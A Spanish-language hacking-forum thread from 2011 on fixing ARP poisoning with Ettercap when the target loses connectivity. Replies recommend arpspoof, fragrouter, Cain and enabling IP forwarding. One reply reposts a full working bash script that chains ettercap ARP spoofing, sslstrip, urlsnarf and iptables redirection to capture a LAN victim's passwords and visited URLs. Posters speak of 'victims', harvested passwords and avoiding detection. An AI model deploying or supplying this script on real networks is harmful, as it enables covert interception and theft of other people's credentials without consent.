Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: MauroMasciar en 7 Febrero 2011, 17:37 pm



Título: ARP Poisoning corta internet en maquina victima
Publicado por: MauroMasciar en 7 Febrero 2011, 17:37 pm
Buenas..
Resulta que estos días estuve viendo como sniffear.. Llegue a utilizar Ettercap+Wireshark.
Con Ettercap hago el envenenamiento arp, así los datos de la pc victima, pasan por mi wireshark, los datos llegan y los veo en wireshark, el problema es que, a los pocos minutos de estar sniffeando, a la pc victima se le corta internet por un poco tiempo, y vuelve, y así y así..

Sniffeo desde una Notebook conectada a RJ45 a una pc de escritorio también conectada a un RJ45...

Alguien sabe porque?
Gracias de antemano

OverGame


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: y0g-s0th0th en 7 Febrero 2011, 17:56 pm
mucho trafico q la conexion de tu notebook no llega a redirigir, mala calidad de la señal... pueden ser varias cosas pero debe venir x ese lado.


saludos


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: MauroMasciar en 7 Febrero 2011, 19:40 pm
Y alguna solución hay? :S


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: MauroMasciar en 7 Febrero 2011, 21:33 pm
Cita de http://www.backtrack-linux.org    >

Si no te funciona puedes usar el command “FragRouter” que es un software para emular un router. Pero no entraremos en detalles.

Fragrouter –i {tu interface de red} –B1

si no hacemos esto, el tráfico quedara cortado para la victima y perderá la conexión, pudiendo así ser descubiertos.
---------------------------------------------------------------------------------

Ya estoy desde hace un tiempo snifeando y no se ha cortado la conexion en la pc victima, parece que el tema queda solucionado..


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: y0g-s0th0th en 7 Febrero 2011, 23:15 pm
sino proba haciendo el envenenamiento con otra cosa. arpspoof te sirve.


saludos


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: MauroMasciar en 8 Febrero 2011, 01:41 am
Si, eso tambien probe, y hasta ahora anda bien..
Gracias por responder xD


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: APOKLIPTICO en 8 Febrero 2011, 04:45 am
Estas bajo linux o windows? Tenés que activar el redireccionamiento de paquetes, sino, es como si hicieses un DoS, bastante útil pero no te sirve para esto.

http://www.ducea.com/2006/08/01/how-to-enable-ip-forwarding-in-linux/ (http://www.ducea.com/2006/08/01/how-to-enable-ip-forwarding-in-linux/)
http://support.microsoft.com/kb/315236 (http://support.microsoft.com/kb/315236)

Btw, es Arp poisoning, no IP poisoning.

Saludos.
APOKLIPTICO


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: .mokk. en 8 Febrero 2011, 05:24 am
Te aconsejo usar Cain te sniffea y a la ves hace lo llamado ARP Spoofing, de ahi puedes ver las web y demas cosas mas sencillo


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: MauroMasciar en 8 Febrero 2011, 14:58 pm
Estas bajo linux o windows? Tenés que activar el redireccionamiento de paquetes, sino, es como si hicieses un DoS, bastante útil pero no te sirve para esto.

http://www.ducea.com/2006/08/01/how-to-enable-ip-forwarding-in-linux/ (http://www.ducea.com/2006/08/01/how-to-enable-ip-forwarding-in-linux/)
http://support.microsoft.com/kb/315236 (http://support.microsoft.com/kb/315236)

Btw, es Arp poisoning, no IP poisoning.

Saludos.
APOKLIPTICO

Le erré...
Emm primero lo hice con Windows y fue cuando la otra pc se desconectaba de internet, despues pase a Backtrack y mientras veia un foro (El de backtrack), encontre ese mensaje... Y ahi funciono durante horas...
Gracias por los links, ahora los revisaré cuando vuelva de compras xD

Te aconsejo usar Cain te sniffea y a la ves hace lo llamado ARP Spoofing, de ahi puedes ver las web y demas cosas mas sencillo

Gracias, ahora lo miro...


Título: Re: IP Poisoning corta internet en maquina victima
Publicado por: r00ty en 10 Febrero 2011, 15:15 pm
si te sirve a mi me ha funcionado mucho este

Sniffeando contraseñas y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf

(No vi nada en las reglas sobre esto, si estoy cometiendo alguna falta les pido disculpas y que el moderador corrija o borre el tema)

Encontre este articulo en un foro que proporciona una herramienta muy buena para hacer sniffing de datos sobre las redes lan/wan, fue publicado en el foro de bactrack-linux.org por Teddy Strand, y fue traducido con la herramienta microsoft translator y otras partes por mi persona, los codigos no fueron modificados para su correcta ejecucion. 

La publicacion es la siguiente:

Estoy cansado de escribir comandos indefinidamente mientras hago pentest a mi red. Así que empecé a escribir scritps para cualquier cosa que hago. Este script es el que utilizo en su mayoría.
Aún soy muy nuevo en BackTrack/Linux, pero esta secuencia de comandos realmente funciona para mí y seguro que otros principiantes pueden hacer buen uso de el.

En primer lugar, asegurate de que la configuracion de etter.conf  tenga el valor por defecto. Tu etter.conf se encuentra en /etc/etter.conf - esta sección debe permanecer comentada:
Código:
# if you use iptables: 
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Esto es porque yo utilizo el ettercap para hacer el arpspoofing, pero no quiero que haga lo del certificado falso (tenemos el sslstrip para que haga el trabajo).

Guarda este código en un archivo de texto y nombralo como loquesea.sh (asegúrese de darle permisos de ejecutable con chmod +x loquesea.sh)

Código:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci

Este script ejecutara sslstrip + archivo de registro, urlsnarf (devolviendo todas las urls a un archivo de texto), ettercap con arpspoofing + archivos de registro (con las contraseñas) + un archivo pcap (para un mayor analisis). Todos los archivos son puestos en el mismo folder, con nombres identicos (claro que con diferente extension).

Por otra parte al salir correctamente del script (y ettercap) con la tecla "q", el script limpiara todo el solo (saliendo de sslstrip, urlsnarf y vaciando el iptables). Por ultimo lee automáticamente las contraseñas desde el archivo de registro de ettercap (.eci) y se ejecuta wireshark para un mayor análisis.

Tip: Para mí, la forma más sencilla de cargar imágenes desde un archivo pcap (que genera el script), es mediante el uso de NetworkMiner para windows. Se ejecuta sin problemas a través de wine, si lo ajustas un poco como muestra de este tutorial:
http://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html (http://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html)

Espero que les sea de ayuda.

Saludos


Título: Re: ARP Poisoning corta internet en maquina victima
Publicado por: hsg en 13 Febrero 2011, 00:39 am
Hola tengo un problema similar (así que posteo acá para no abrir otro tema), pero se da solamente con paginas "seguras", y hace que luego de dar el si a los certificados malos, la pagina que la victima carga no se vea completa, y en el mejor de los casos, no se carguen algunas imágenes, pero también me ha pasado que no se ha cargado nada mas aparte de texto o que simplemente la victima tenga un error de pagina no disponible (y en el caso de hotmail.com, ni siquiera el error aparece)

El comportamiento al principio de la "sesión" es totalmente normal (las paginas cargan perfecto sin importar si tienen o no SSL y las contraseñas me llegan sin problemas, pero mientras más paginas con SSL se carga, peor empiezan a aparecerle a la victima (las paginas http funcionan perfecto en todo momento)

Estoy usando Ettercap en arch linux con wlan, pero ya estoy descargando BackTrack para ver si tengo mejores resultados usando otras herramientas, pero igual me interesa saber por que se están perdiendo estos paquetes. ¿alguna idea?


Título: Re: ARP Poisoning corta internet en maquina victima
Publicado por: MauroMasciar en 17 Febrero 2011, 00:34 am
Abri un nuevo tema...
No me gusta cuando alguien pregunta cuando esta en el problema de otro -.-
Por cierto, gracias a todos por la ayuda.

Estas bajo linux o windows? Tenés que activar el redireccionamiento de paquetes, sino, es como si hicieses un DoS, bastante útil pero no te sirve para esto.

http://www.ducea.com/2006/08/01/how-to-enable-ip-forwarding-in-linux/ (http://www.ducea.com/2006/08/01/how-to-enable-ip-forwarding-in-linux/)
http://support.microsoft.com/kb/315236 (http://support.microsoft.com/kb/315236)

Btw, es Arp poisoning, no IP poisoning.

Saludos.
APOKLIPTICO

El de windows no me funciono...
Pero lo seguire desde backtrack para no complicar las cosas..
Gracias de nuevo xD